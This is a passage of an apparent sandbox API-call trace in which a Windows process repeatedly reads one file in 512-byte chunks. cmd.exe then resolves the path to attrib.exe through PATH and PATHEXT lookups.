lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.091] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.092] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.093] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.094] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.095] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.096] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.097] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.098] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.119] _close (_FileHandle=4) returned 0 [0131.119] FindNextFileW (in: hFindFile=0x200820, lpFindFileData=0x12f3a0 | out: lpFindFileData=0x12f3a0) returned 0 [0131.120] GetLastError () returned 0x12 [0131.120] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.120] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.122] _close (_FileHandle=3) returned 0 [0131.122] GetConsoleTitleW (in: lpConsoleTitle=0x12f7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.122] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.122] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.123] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.123] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.123] GetLastError () returned 0x2 [0131.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.123] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.124] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.124] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.124] GetConsoleTitleW (in: lpConsoleTitle=0x12f56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.124] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f3f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f4bc | out: 